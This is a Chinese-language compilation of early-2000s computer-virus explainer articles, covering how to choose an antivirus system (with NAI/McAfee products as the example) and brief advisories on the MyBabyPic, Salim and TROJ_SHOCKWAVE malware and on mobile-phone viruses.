  病毒肆虐之時,正是反毒廠商大發橫財的日子,這聽起來讓人頗感彆扭,難怪有人甚至懷疑,不少病毒就是那些反毒公司製造的。但憑心而論,使用者與反病毒軟體公司的關係,就像病人與醫生的關係,醫生不能為了利益希望別人多生病,病人也不能因為付出了金錢就產生怨恨。在網路時代,醫生與病人這種關係,更應該由於病毒的猖獗而緊密相連。為了追逐病毒越來越快的腳步,反毒公司也別無選取地愛上了網路。通過互聯網,各公司的反病毒中心可以以最快的速度,對全球範圍內新出現的病毒做出反映。此外,通過收取會員費的模式,在互聯網上提供反毒服務,也成為反毒公司的一條財路。以McAfee為例,它的網站向會員收取49.95美元的年費。不到三個月的時間,登記為會員的使用者就達到了12,800名,他們來自世界230個國家。網路造就了全球化的病毒,網路也造就了全球化的反毒公司。

  病毒愛上網路,反病毒公司也愛上了它,隨著網路的不斷發展,這一對冤家的恩愛廝殺就演繹出了全新的病毒時代。

  病毒:我的明天更美好

  對未來的世界,你會有什麼樣的想像呢?也許一切已經被媒體描繪得令人嚮往:在家中,你悠閒地躺在沙發上,觀看寬帶互動電視。沒有什麼家務事讓你操心,屋裡的一切都是可以上網的智慧化產品,從冰箱、烤麵包機到你腳下穿的球鞋。出門時,乘坐的汽車具有衛星導航系統和多媒體互動裝置,在車上,你可以隨時瀏覽新聞,收取Email。至於那些惱人的機械故障,你完全不必擔心,車上配備的智慧系統會把一切微小的故障在發生前知會修理站,在你毫不查覺的情況下,所有問題都被解決得乾乾淨淨。

  但在這幅高科技描繪的美好圖畫中,還缺少了一樣東西,那就是病毒。它是網路名副其實的親密愛人,我們越接近網路,就越有機會碰上它的身影,當我們完全陷入網路之中時,病毒甚至是致命的。這絕不是危言聳聽,試想一下,在你駕駛的途中,汽車的智慧系統突然因為病毒失靈會造成什麼樣的後果?

當然,過度的恐懼也是不必要的,從目前出現的病毒來看,大多數只是通過PC作用於訊息裝置,而不是直接感染它們,換句話說,它們的寄生與傳播,主要還是依賴於PC動作系統。基於現在的技術水平,談純粹的手機和訊息電器的病毒還為時過早。不過,專家們也指出,天真地以為這類情況不會發生的態度無疑也是錯誤的。從理論上講,任何具備記憶體並且依賴軟體代碼運作的裝置都有可能成為惡意攻擊的目的。

  以這次的Palm掌上電腦病毒為例,該程式據稱實際上是Palm公司的瑞典程式員Aaron為了檢驗裝置而開發的。據他介紹,此程式的主要用途是對Palm手持裝置進行起始化的工具。在接受國外媒體電話採訪中,他說:「我開發了一個叫『清潔工』的Palm程式。該程式能夠找出過時的資料庫並清除他們,目的是重新恢復一個乾淨的環境」。但現在,該程式被改成了一個典型的特洛伊木馬,並被裝扮成「掌上型遊戲軟體」供人下載,同時以該遊戲Crack1.1版本之名,經由「網路接力聊天」系統傳播。此病毒軟體發作時,掌上電腦內的所有檔案將被抹掉。

  為了吸引使用者,廠家圍繞訊息裝置的套用竭盡心智,新產品深入到人們飲食起居的每個環節,但安全性卻常常被忽略。由於這些裝置大多數都是基於軟體的智慧產品,而且可隨時通過網路升級,這無疑給病毒的侵入造成了絕佳的機會。NetworkSecurityTechnologies的進階工程師Smith評價說:「當進階的套用使用低級的安全控制,那麼什麼可怕的事情都可能發生。可以確信,不遠的將來,PC將決不是唯一受到病毒攻擊的目的。」

  「明天將更加美好。」病毒這樣想,反毒公司也這樣想。但是我們呢?



電腦病毒小知識速查系列十七

選取防病毒系統的七點注意

如何選取一個好的防病毒系統是許多人困惑的,這裡我們就以NAI公司的McAfee AVD (Active Virus Defense)網路防病毒系統為例進行討論。

  注意一,產品體系要完整、檢驗率要高
  一個好的防病毒系統應該能夠覆蓋到每一種需要的平台。我們都知道,病毒的入口點是非常多的。在一個具有多個網路入口的連線點的企業網路環境中,病毒可以由軟碟、光碟等傳統介質進入,也可能由電子信件、網路伺服器等進入,還有可能從外部網路中通過檔案傳輸等模式進入。病毒可能的入口點如圖1所示。

  在圖1中標出的入口點處,任何一點沒有部署防病毒系統,對整個網路都是一個安全的威脅。比如一個木桶由很多塊木板拼成,該木桶的容量就取決於最矮的那塊木板的長度,而不是最高的。所以,我們一般需要考慮在每一種需要防護的平台上都部署防病毒軟體。它大體上分為以下幾類平台:用戶端、信件伺服器、其他伺服器、通訊閘。

  以NAI為例,它針對信件伺服器和群件伺服器以及通訊閘防病毒,提供了Groupshield和Webshield兩種解決專案。其中Groupshield是基於Microsoft Exchange 和 Lotus Notes 群件伺服器的防病毒保護解決專案。同Netshield 一樣,GroupShield 提供了強大的管理功能,控制所有檔案、套用程式並執行遠端服務、安裝與組態。強大的集中警示功能可以通過電子信件、印表機、尋呼機、DMI警示或網路消息,傳輸各種病毒警示給攜帶病毒信件的寄件人、收件人和系統管理員。而對於基於SMTP的信件伺服器,NAI提供了Webshield SMTP防病毒系統,它可以形成一個病毒過濾前置機,完全能夠適用於任何類型的SMTP信件伺服器,而不管該伺服器採用何種動作系統和信件伺服器版本。而且,使用者可以針對信件的標題以及正文設定內容過濾策略,杜絕不正當訊息的流通。

  注意二,軟體控制台功能要完善
  為了方便集中管理,防病毒軟體控制台首先需要解決的就是管理容量問題。也就是每一台控制台能夠管理到的客戶機的最大數目。另外,對於一個企業內定的不同部門,我們有可能需要設定不同的防病毒策略,比如一些關鍵的業務部門伺服器和電腦,我們需要每當有新的病毒特徵碼就盡快升級;但是對於一些非關鍵業務部門的電腦,我們可以考慮時間稍長再升級一次;對於白天比較繁忙的伺服器,我們可以將病毒特徵碼升級安排在晚上自動進行。一個好的控制台應該容許管理員按照IP位址、電腦名稱、子網甚至NT域進行安全策略的分別實施。

  在這方面NAI有兩種控制台可供使用:一種稱為ePO ( ePolicy Orchestrator),是一種大規模、企業級的防病毒控制台;另外一種稱為ME (Management Edition),是一種適合在小規模網路中使用的控制台。兩種控制台都能夠進行防病毒軟體的分發和升級,使用者可以根據需要選用兩種產品。

  注意三,通過廣域網管理的流量要盡量少
  在一個需要通過廣域網進行管理的企業中,由於廣域網的頻寬有限,防病毒軟體的安裝和升級流量問題也是必須要考慮到的。NAI的做法是:首先,自動升級功能容許升級發生在非工作時間,盡量不佔用業務需要的頻寬;其次, 利用AVD瘦用戶端技術產品VirusScan TC,它私人於部署在大型企業中的客戶機上的產品,大小僅有傳統防病毒軟體的三分之一;另外,對於必須頻繁升級的特徵碼,NAI AVD採用了一種增量升級模式的選項,將傳統的1M以上的特徵碼壓縮到了100K左右。

  注意四,報表功能要方便易用
  一個網路中的病毒活動狀況對於網路管理員來說是非常重要的,通過瞭解網路中的病毒活動情況,網路管理員可以瞭解哪些病毒活動比較頻繁、哪些電腦或是使用者的檔案比較容易感染病毒以及發現的病毒的清除情況等等,以便修改病毒防範策略以及瞭解病毒的來源情況,方便進行使用者、檔案資源的安全管理。實用、界面友好的報表是一個網路防病毒軟體必備的功能。如圖2所示。

  注意五,對電腦病毒要有實時防範能力
  傳統意義上的實時電腦病毒防範是指防病毒軟體能夠常駐記憶體,對所有活動的檔案進行病毒掃瞄和清除。由於病毒活動頻繁,再加上網路管理員一般都工作忙碌,有可能會導致病毒特徵碼不能及時更新。這就需要防病毒軟體本身能夠具有一定程度的不詳病毒識別能力,一旦防病毒軟體發現一個檔案可能攜帶病毒,它應該有能力提供一種解決方法對該檔案進行處理,以免系統或是檔案受到不詳病毒的破壞。另外,病毒一般都經常存在一個爆發期,比如2000年元旦,在這個爆發期內,電腦病毒防範系統應該能夠依據具體情況自動進行報警、策略修改或是更新特徵碼等工作,以免影響進一步擴大。

  NAI AVD具有一種自動免疫的功能,啟用該功能後,防病毒軟體就可以對不詳病毒進行判斷,並且若果懷疑某個檔案攜帶病毒,它就會自動提取病毒樣本,傳送給NAI設立在全球各地的病毒研究小群組,並且若果小群組確認是病毒的話,就會馬上作出響應。

  此外,NAI AVD還具有防止病毒爆發引起損失的功能,叫做Outbreak管理器。該管理器可以執行在信件防病毒系統和通訊閘防病毒系統上。管理員可以預先定義策略,如當在10分鐘內發現100個美麗莎病毒在網上傳播,就採取特定行動,如給管理員傳送呼機或電子信件告警;再過10分鐘又發現100個該病毒,則採取進一步行動如變更掃瞄頻率,啟動自訂掃瞄對關鍵檔案進行檢查;再進一步可以完成更新病毒特徵碼等工作,若果病毒爆發發生在預定義的非工作時間,該管理器甚至可以暫時停止信件的轉信,阻止病毒的蔓延。如圖3所示。

  注意六,病毒特徵碼升級要快速及時
  反病毒軟體若果沒有即時升級就達不到進行病毒防範的目的。所以,能夠提供一個方便、有效和快速的升級模式是防病毒系統應該具備的重要功能之一。NAI的防病毒特徵碼的升級一般每星期一到兩次,在病毒多發期甚至能夠達到每5分鐘更新一次特徵碼。如此頻繁的更新若果讓每一個使用者手動進行是不現實的,AVD 提供了幾種不同的升級模式:

  1. 使用者自訂升級策略,讓軟體到指定時間後自動到Internet或近端檔案伺服器進行特徵碼更新。

  2. 管理員在控制台發出強制升級指令,對一個或多個防病毒管理群組中的電腦進行統一升級。

  3. 升級特徵碼在網路上共享,由使用者分別升級。

  在一個大型的企業中,由於管理員工作繁忙,可能無法經常上網檢查防病毒軟體的更新情況,從而有可能無法及時得到升級訊息。對此,NAI提供了一種工具和服務,叫做SecureCast,管理員可以利用該服務一天24小時自動地從NAI服務站台上得到最新的軟體版本更新和特徵碼更新訊息,內含自動下載需要更新的特徵碼檔案。這一切都不需要管理員的任何手動干預!若果配合ePO的自動分發功能,管理員甚至無須動手就可以完成即時升級工作。

  注意七,研發能力和技術支援力量要強
  NAI公司是全球最大的專業從事網路安全的廠商,其防病毒產品具有雄厚的使用者基礎和市場份額。它具有一個分佈全球近20個國家的反病毒緊急響應小群組(AVERT),可以快速對病毒事件進行響應。不管病毒在何時何地爆發,NAI總能夠提供最新的病毒訊息和處理專案。

  綜上所述,目前的防病毒工作的意義早已脫離了各自為戰的狀況,技術也不僅僅局限在單機的防病毒。目前,若果需要對整個網路進行規範化的網路病毒防範,我們就必須瞭解最新的技術,結合網路的病毒入口點分析,很好地將這些技術套用到自己的網路中去,形成一個協同作戰、統一管理的局面。這樣的病毒防範體系,才能夠稱得上是一個完整的、現代化的網路病毒防禦體系。


電腦病毒小知識速查系列十八

看似淫穢漫畫,實是愛蟲病毒變種

一種「愛蟲」病毒的新變形於本週二開始四處傳播。這種病毒名叫「MyBabyPic」,看上去非常像一個通過電子信件轉信來的淫穢漫畫。
  這種病毒仍然是通過電子信件傳播(只能通過Outlook傳播),附件是一個採用Visual Basic語系編寫的可執行檔案——MyBabyPic.EXE。信件的主旨欄寫著「My baby pic !!!」,信件的正文是「Its my animated baby picture !!」。

  若果接收者開啟附件,將會看到一張嬰兒的動畫圖片。這個還睡在嬰兒床中的嬰兒卻長有一個成年人尺寸大小的陰莖,而且,動畫效果還會使陰莖出現在兩個不同的方位。這張圖片可能會鼓勵接收者將其轉信給其他互聯網使用者,就好像傳播一個淫穢漫畫一樣。

  但實際上,若果開啟了附件,這種病毒就會在近端的檔案系統中進行自我複製,並在大約10分鐘後向Outlook通訊錄上的每一個位址發出一封電子信件。這種病毒還會生成一群組檔案,並加入到Windows系統註冊表的啟動部分,每當被感染的電腦啟動一次,它就會自動執行一次。

  據稱,這種病毒擁有非常危險的有效載荷,能輕易移除被感染電腦上的資料。根據目前的時間和日期,它還可以啟用/關閉鍵盤上的NumLock,CapLock和ScrollLock鍵;可以向鍵盤緩衝發出「.IM_BESIDES_YOU_」訊息,並傳送不同的文字訊息。

  此外,這種病毒還可以破壞以VBS,VBE,JS,JSE,CSS,WSH,SCT,HTA,PBL,CPP,PAS,C,H,JPG,JPEG,MP2和MP3等為副檔名的檔案。


電腦病毒小知識速查系列十九

線上聊天當心「薩利姆」病毒

  最近一個通過映射磁碟機和線上聊天系統傳播的「薩利姆」(W97M/Salim.A)病毒被冠群金辰的全球病毒監測網發現。據瞭解,W97M/Salim.A是一個巨集病毒和通過線上聊天系統傳播的蠕蟲,除了在ThisDocument模組中寫入病毒代碼外,它也在傳播過程中截取文件內容。

  「薩利姆」蠕蟲依靠文件事件處理程式來執行,當一個已感染的文件被開啟時,巨集病毒就被啟用,當染毒文件被關閉時,病毒的Document_Close巨集將開始執行。與其它巨集病毒不同,它並不使'巨集病毒保護選項'失效,因此巨集報警仍將顯示。它在通用範本中執行一個'am I here'的檢查,比較它的ThisDocument中第一行代碼是否符合'PIJAVICA;若果不符合,所有在通用範本的ThisDocument對像中的原代碼將被移除,病毒的原代碼將從目前文件插入目的對象。

  之後,「薩利姆」病毒將嘗試感染目前被Word開啟的所有文件。然而,這種嘗試將由於一個錯誤而失敗。病毒將在C盤根目錄生成檔案Salim_se.doc和Win32Drv.doc,這兩個檔案是帶有巨集病毒代碼的啟用文件的兩個複製檔案。這兩個檔案含有啟用文件的內容,能將敏感訊息暴露給不被期望的瀏覽者。Salim_se.doc的一個副本也會在每個映射磁碟機生成。

  若果在一個已感染的系統中存在目錄"C:\MIRC",Script.ini檔案將被創造或被覆蓋,以使C:\Salim_se.doc能通過線上聊天系統送出。


電腦病毒小知識速查系列二十

手機病毒欲乘Java強勢而來

  日前在東京舉行的電腦病毒國際會議「AVAR 2000」上,多位專家都對於「手機病毒」發出了警示,雖然目前還沒有關於手機感染病毒的報告。不過,據說今後隨著在手機中附加Java功能的增多,將有可能出現手機病毒。  

  在舉行會議的第2天,由AVAR成員、Symantec的SARC經理星澤裕二做了有關移動式終端--尤其是手機病毒的講演。  

  目前,手機還不能執行由使用者等編寫的程式。因此還沒有手機病毒。今年6月份有人提出過關於與手機有關聯的病毒「TIMOFONICA」的病毒報告。不過,該病毒只是向手機傳送電子信件的病毒,只能在個人電腦上感染及發作。然而,據說伴隨著配備Java功能的i模式手機的登場,情況將會發生很大的變化。  

  芬蘭的F-Secure的反病毒研究經理Mikko Hypponen也發出類似的警示。  

  「目前已經出現了在PDA上執行的病毒。這就是在9月份發現的Palm病毒『Phase'。若果手機功能越來越多,同樣也會出現手機病毒。我曾經聽說某個製作病毒的集團宣佈要製造手機病毒的消息」。  

  「若果手機可以執行程式的話,肯定能夠製造出在該平台上執行的病毒。但是也不能因此就'不給手機追加功能'。對於使用者來說,沒有什麼比提高功能更為重要的了」。



電腦病毒小知識速查系列二十一

病毒佯披Flash外衣

趨勢科技12月1日發佈一級病毒警訊,一隻名為」TROJ_SHOCKWAVE.A"的新病毒,1日凌晨透過電子信件大量散播,並在美國傳出數起感染災情。該病毒屬於特洛依木馬型(Trojan)病毒,以夾帶著」CREATIVE.EXE"檔案的電子信件進行散播(如圖一),使用者中毒後,病毒會將自己寄給使用者Outlook通信錄裡的所有名單,自動對這些信件位址傳送垃圾信件。信件主旨為:」AgreatShockwaveflashmovie",信件內容「CheckouthisnewflashmoviethatIdownloadjustnow...It'sGreat."。

該病毒最特殊之處,在於以Flash檔來吸引電腦使用者開啟,趨勢科技技術支援部經理林錦忠強調:「近年來,愈來愈多的電子賀卡、卡通、遊戲及廣告改以Flash來表現,網友間分享動畫檔的情況也相當普遍。這就成為TROJ_SHOCKWAVE.A病毒作者所期待希望多媒體迷會在無意開啟病毒附帶檔。」 趨勢科技呼電腦使用者收到以上信件主旨或夾帶著」CREATIVE.EXE"檔案的電子信件,請直接移除,不要開啟。趨勢科技美國分公司已接獲數起客戶感染報告,該公司表示,TROJ_SHOCKWAVE.A病毒已在外散播(inthewild),趨勢科技產品可偵測該病毒。

趨勢科技eDoctor病毒實驗室分析,當使用者收到帶有病毒的電子信件,在不知情的狀況下執行該附帶檔,電腦隨即中毒。病毒會將自己寄給使用者Outlook通信錄裡所有的名單,自動對這些信件位址傳送垃圾信件,同時夾帶病毒檔案CREATIVE.EXE。病毒會尋找使用者硬碟中所有*.JPG,*.ZIP檔案,將其移往C:\root資料夾,變更檔案附檔名,增加下列文字「changeatleastnowtoLINUX",例如:XXXX.ZIP變成「XXXX.ZIPchangeatleastnowtoLINUX"。病毒會在C:根目錄下加入messageforu.txt文字檔,紀錄所有被搬移檔案的原始位置。